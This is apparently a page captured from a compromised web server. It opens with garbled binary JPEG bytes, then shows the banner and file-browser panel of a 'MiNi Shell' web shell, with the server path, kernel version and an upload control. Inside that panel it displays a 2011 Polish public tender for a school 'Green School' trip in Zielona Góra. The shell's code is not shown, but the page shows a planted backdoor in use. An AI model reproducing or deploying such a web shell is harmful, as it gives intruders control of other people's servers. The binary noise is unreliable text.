JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110203/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110203/16924-N-2011.html

<p class="kh_header"><b>Zielona Góra: Organizacja Zielonej Szkoły dla uczestników projektu Fascynacje zaklęte w nauce i biznesie. Ogólnopolski program rozwoju kompetencji kluczowych w zakresie nauk matematyczno-przyrodniczych i przedsiębiorczości dla uczniów gimnazjów w ramach  zadania współfinansowanego ze środków Europejskiego  Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 16924 - 2011; data zamieszczenia: 03.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kształcenia Ustawicznego i Praktycznego , ul. Długa 13, 65-401 Zielona Góra, woj. lubuskie, tel. 068 4530131, faks 068 3530150.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cku.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja Zielonej Szkoły dla uczestników projektu Fascynacje zaklęte w nauce i biznesie. Ogólnopolski program rozwoju kompetencji kluczowych w zakresie nauk matematyczno-przyrodniczych i przedsiębiorczości dla uczniów gimnazjów w ramach  zadania współfinansowanego ze środków Europejskiego  Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest organizacja Zielonej Szkoły dla uczestników projektu  Fascynacje zaklęte w nauce i biznesie. Ogólnopolski program rozwoju kompetencji kluczowych w  zakresie nauk matematyczno-przyrodniczych i przedsiębiorczości dla uczniów gimnazjów  w ramach zadania współfinansowanego ze środków Europejskiego  Funduszu Społecznego.
1.1 Głównym celem Projektu jest rozwój kompetencji kluczowych w zakresie nauk 
    matematyczno - przyrodniczych oraz przedsiębiorczości wśród uczniów gimnazjów   w  Polsce. 
        Projekt obejmuje swoim zasięgiem wybraną młodzież z gimnazjów całego kraju - 730 osób. 
        Podsumowaniem III edycji przedmiotowego Projektu jest organizacja Zielonej Szkoły pod 
        hasłem: Matematyka królową nauk  z udziałem uczniów i Koordynatorów Centrów 
        (nauczycieli) biorących udział w projekcie.
1.2. Zakres przedmiotu zamówienia :
        Zamówienie obejmuje:
1)	przewóz uczestników w liczbie 730 uczniów i 73 opiekunów z miejsca zbiórek do 4 miejsc zakwaterowania i z powrotem,
2)	zapewnienie uczestnikom zakwaterowania w obiektach o warunkach porównywalnych do ośrodków wczasowych,
3)	zapewnienie warunków do realizacji zajęć dydaktycznych z zakresu przedmiotów matematyczno - przyrodniczych i przedsiębiorczości,
4)	zapewnienie uczestnikom całodziennego wyżywienia w czasie pobytu,
5)	zorganizowanie jednej wycieczki dla każdej grupy w czasie pobytu,
6)	ubezpieczenie uczestników od następstw nieszczęśliwych wypadków.
1.3.   Uczestnicy podzieleni zostaną na 4 grupy w zależności od miejsca zamieszkania:
1)	grupa północny wschód licząca 200 osób (180 uczniów, 18 opiekunów, 1 kierownik, 1 koordynator) obejmująca uczniów i opiekunów z obszaru województw: mazowieckiego, podlaskiego, warmińsko-mazurskiego, łódzkiego (bez miejscowości Galewice, Mierzyce),
2)	grupa północny zachód licząca 200 osób (180 uczniów, 18 opiekunów, 1 kierownik, 1 koordynator) obejmująca uczniów i opiekunów z obszaru województw: zachodniopomorskiego, pomorskiego, kujawsko-pomorskiego i wielkopolskiego (bez miejscowości Brzeziny, Koźminek, Kawęczyn, Biała),
3)	grupa południowy wschód licząca 222 osoby (200 uczniów, 20 opiekunów, 1 kierownik, 1 koordynator) obejmująca uczniów i opiekunów z obszaru województw: lubelskiego, małopolskiego, podkarpackiego, świętokrzyskiego, śląskiego.
4)	grupa południowy zachód licząca 189 osób (170 uczniów, 17 opiekunów, 1 kierownik, 1 koordynator) obejmująca uczniów i opiekunów z obszaru województw: dolnośląskiego, lubuskiego, opolskiego, łódzkiego (miejscowości Galewice, Mierzyce) i wielkopolskiego (miejscowości Brzeziny, Koźminek, Kawęczyn, Biała),
1.4.   Usługa realizowana będzie w następujących terminach: 
1)	grupa północny wschód: od 16 do 18 maja 2011 r.,
2)	grupa północny zachód: od 18 do 20 maja 2011 r.,
3)	grupa południowy wschód: od 23 do 25 maja 2011 r.
4)	grupa południowy zachód: od 25 do 27 maja 2011 r.  

1.5.	Wykonawca zobowiązany jest do:
1.  przewozu uczestników Zielonej Szkoły:
1)	środkami transportu (autokary, busy) umożliwiającymi przewóz wskazanej liczby uczestników Zielonej Szkoły z miejsc zbiórek - siedziby gimnazjum -  wskazanych w  Załączniku  nr  11  do SIWZ  do miejsca docelowego oraz z powrotem,
2)	przyjazd do miejsca zakwaterowania do godz. 13, wyjazd w drogę powrotną w godz. 14.00 - 14.30,
3)	poniesienia kosztów delegacji 4 kierowników i 4 koordynatorów zajęć z miejsca zamieszkania do miejsca docelowego i z powrotem,
4)	poniesienia wszelkich kosztów związanych z realizacją usługi (w szczególności  koszty parkingów, płatnych przejazdów, koszty delegacji kierowcy, koszty  postojów, koszty noclegu   i wyżywienia kierowców itp.),

2.	zapewnienia zakwaterowania w obiektach o warunkach porównywalnych do ośrodków wczasowych, usytuowanych na terenie województw:
- podlaskiego - grupa północny wschód, 
- zachodniopomorskiego - grupa północny zachód,
- podkarpackiego - grupa południowy wschód,
- dolnośląskiego - grupa południowy zachód.

1)	zakwaterowania uczestników Zielonej Szkoły w obiekcie spełniającym następujące warunki: 
a)	pokoje 2- 3 - 4 osobowe  dla młodzieży, pokoje  2 - osobowe dla kadry
 (wyłącznie pojedyncze łóżka),
b)	węzeł sanitarny w pokojach,
2)	obiekt musi być przystosowany do prowadzenia zajęć dydaktycznych z zakresu przedmiotów matematyczno - przyrodniczych i przedsiębiorczości (sala konferencyjna, na 200 - 220 osób, która musi umożliwiać dostosowanie do celów wystawienniczych -wyposażona w 20 stolików o długości 2metrów lub porównywalne i co najmniej 200 krzeseł oraz sprzęt umożliwiający prowadzenie zajęć z wykorzystaniem multimediów),

3.	zapewnienia wyżywienia uczestnikom Zielonej Szkoły:
1)	wykonawca zapewni pełne wyżywienie dostosowane dla dzieci i młodzieży dla grupy wiekowej 13-15  lat oraz kadry- 4 posiłki  dziennie (śniadanie, obiad - dwa  dania i deser, podwieczorek i kolacja), ciągły dostęp do napojów: woda, soki, herbata. 
2)	 posiłki muszą spełniać następujące warunki:
a)	muszą być przygotowane pod względem składu i jakości zgodne z normami żywienia dzieci w wieku  szkolnym  określonymi w odrębnych  przepisach,
b)	posiłki powinny być urozmaicone, o wysokiej jakości odżywczej, odpowiadające  normom odżywczym obowiązującym w punktach zbiorowego żywienia, 
c)	posiłki powinny być przygotowane zgodnie z zasadami racjonalnego żywienia,
sporządzone z pełnowartościowych produktów posiadających aktualne terminy ważności.  
3)	wykonawca zobowiązany jest zapewnić uczestnikom posiłki w godzinach określonych                              w  programie Zielonej Szkoły - Załącznik nr 12 oraz suchy prowiant i napoje na drogę powrotną.
4.	zorganizowania jednej wycieczki autokarowej dla każdej grupy:
1)	wycieczka powinna zostać zorganizowania w drugim dniu pobytu, w godz. 8.30-13.30,
2)	wycieczka powinna umożliwić uczestnikom zwiedzenie atrakcyjnych miejsc w okolicy,
3)	wykonawca zapewnia pilotów, wykwalifikowanych przewodników i bilety wstępu do zwiedzanych miejsc.
5.	ubezpieczenia uczestników od następstw nieszczęśliwych wypadków:
1)	Przedmiotem ubezpieczenia są następstwa nieszczęśliwych wypadków doznanych przez uczestników Zielonej Szkoły; zakres czasowy: 24h /dobę, w okresie podanym w  pkt. 3.4.1)-4) od chwili wyjazdu z miejsca zbiórki do powrotu do miejsca zbiórki,
2)	 Świadczenia wypłacane są w kraju i wyłącznie w złotych polskich.
3)	Przy ustalaniu wysokości należnego świadczenia nie będzie brany pod uwagę charakter 
wykonywanych czynności przez ubezpieczonego uczestnika oraz jego wiek.
4)	 Brak franszyz i udziałów własnych,
5)	WARIANT UBEZPIECZENIA BEZKOMISYJNY,
6)	Rodzaje i wysokość świadczeń obligatoryjnie wymaganych  określa  Załącznik nr 10 do SIWZ,
7)	Suma ubezpieczenia : 20.000 zł dla każdego ubezpieczonego.
8)	Zakres ubezpieczenia:		
a)	śmierć w następstwie NW : suma ubezpieczenia 20 000,00 zł,
b)	trwały uszczerbek na zdrowiu: suma ubezpieczenia 20 000,00 zł (1% uszczerbku = 1% sumy     ubezpieczenia),
c)	 zakres rozszerzony o zawał serca i udar mózgu,
9)	Forma wystawienia polis NNW: polisy zostaną wystawione w formie grupowego ubezpieczenia   dla każdej grupy odrębnie wraz z wykazem ubezpieczonych osób.
10)	Wykonawca zobowiązany jest przedłożyć polisy na co najmniej 14 dni przed terminem pierwszej Zielonej Szkoły..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium:
1. składając ofertę każdy Wykonawca zobowiązany jest wnieść wadium.
2. kwota wymaganego wadium wynosi: 10.000,00 zł
3. wadium musi zostać wniesione na cały okres terminu związania ofertą.
4. wadium należy wnieść przed upływem terminu składania ofert.
5. wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy Pzp.
6. gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenie bankowe oraz poręczenia innych instytucji winny zostać złożone w formie dokumentu oryginalnego.
7. wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego : PKO BP S.A. nr 49 1020 5402 0000 0104 0247 8352 z podaniem tytułu WADIUM: Postępowanie nr 2300-1 2011 UDA-POKL.03.03.04-00-049 08-00
8. wadium w formie pieniężnej (przelew) musi zostać zaksięgowane na rachunku Zamawiającego przed wskazanym terminem składania ofert: (dzień, godzina, minuta składania ofert).
9. kserokopię potwierdzenia złożenia wadium w formie pieniężnej należy dołączyć do oferty.
10. w przypadku wadium wnoszonego w poręczeniu lub gwarancji, oryginał dokumentu
 (poręczenia lub gwarancji) należy złożyć w kasie Zamawiającego  w godz. 8.00 do 13.00 lub w innych godzinach po telefonicznym uzgodnieniu (za wyjątkiem sobót, niedziel oraz świąt). Kopię dokumentu (poręczenia lub gwarancji) zdeponowanego w kasie, poświadczonego za 
           zgodność  z oryginałem przez osobę podpisującą ofertę należy dołączyć do oferty wraz z kopią   
          potwierdzenia wniesienia wadium w kasie.
11. nie wniesienie wadium w terminie określonym w niniejszej SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy, którzy posiadają aktualny  wpis w rejestrze organizatorów turystyki i pośredników turystycznych prowadzonych przez marszałka województwa właściwego ze względu na siedzibę wykonawcy, stosownie do przepisów ustawy z dnia  29 stycznia 1997r. o usługach turystycznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania tego warunku wykonawca zobowiązany jest wykazać realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej  jednej usługi (w ramach jednego zadania)  organizacji wypoczynku dla co najmniej 180  dzieci uczestniczących w obozie, kolonii lub wycieczce, udokumentowaną, że  została   wykonana  lub jest wykonywana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania tego warunku wykonawca zobowiązany jest 
wykazać, że  dysponuje lub będzie dysponować środkami transportu (autokarami, busami) umożliwiającymi przewóz wskazanej liczby uczestników Zielonej Szkoły ,spełniającymi    
          wymagania techniczne określone przepisami prawa ruchu drogowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełniania tego warunku wykonawca zobowiązany jest 
          wykazać, że dysponuje  osobami, które  będą  uczestniczyć w wykonywaniu niniejszego zamówienia: tj: osobami   
          uprawnionymi do kierowania pojazdami, posiadającymi prawo jazdy kat. D.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania tego warunku wykonawca         
        zobowiązany jest wykazać, że posiada aktualną opłaconą polisę lub inny dokument   
        ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności 
        cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę  nie mniejszą niż 100.000 zł lub równowartość tej kwoty wyrażona w euro wg średniego kursu NBP obowiązującego na dzień otwarcia ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust.1 pkt 1-4 ustawy PZP
2. Zaświadczenie o wpisie do rejestru organizatorów turystyki i pośredników turystycznych prowadzonych  przez marszałka województwa  właściwego ze względu na siedzibę wykonawcy.
3. Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy pzp                       
       i określonych w pkt 5.1.1.-5.1.4., polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 6.2.1.-6.2.2., iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy Pzp.
4. wypełniony formularz oferty
5. oświadczenie, że wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika Nr 2 do SIWZ
6. zaakceptowany projekt umowy
7. 6.5.4	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy
8.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość dokonywania istotnych  zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy wraz z określeniem warunków takich zmian zawarta jest w projekcie umowy stanowiącym załącznik  Nr 13 do SIWZ tj:
1.	Strony dopuszczają możliwość zamiany postanowień zawartej umowy w stosunku
do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
1)	 w zakresie zmiany terminu wykonania przedmiotu zamówienia, pod warunkiem że zaszła konieczność zmiany terminu z przyczyn niezależnych od  Zamawiającego,
2)	 zmiany liczby uczestników, 
3)	 zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia,
4)	 zmiany  nazwy zadania,
5)	 zmiany osób reprezentujących, w przypadku zmian organizacyjnych,
6)	 w każdym przypadku gdy zmiana jest korzystna dla zamawiającego (np. gdy obniży  to koszty zadania albo podwyższy standard wykonywanego zadania),
2.	Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, jeżeli konieczność wprowadzenia takich zmian  wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego np.: zmniejszenie wartości zamówienia.
3.	Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.cku.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Kształcenia Ustawicznego i Praktycznego
ul. Długa 13, 65-401 Zielona Góra
fax: 68-453-01-50.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2011 godzina 09:00, miejsce: Centrum Kształcenia Ustawicznego i Praktycznego
ul. Długa 13, 65-401 Zielona Góra
pokój 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Fascynacje zaklęte w nauce i biznesie. Ogólnopolski program rozwoju kompetencji kluczowych w zakresie nauk matematyczno-przyrodniczych i przedsiębiorczości dla uczniów gimnazjów w ramach  zadania współfinansowanego ze środków Europejskiego  Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com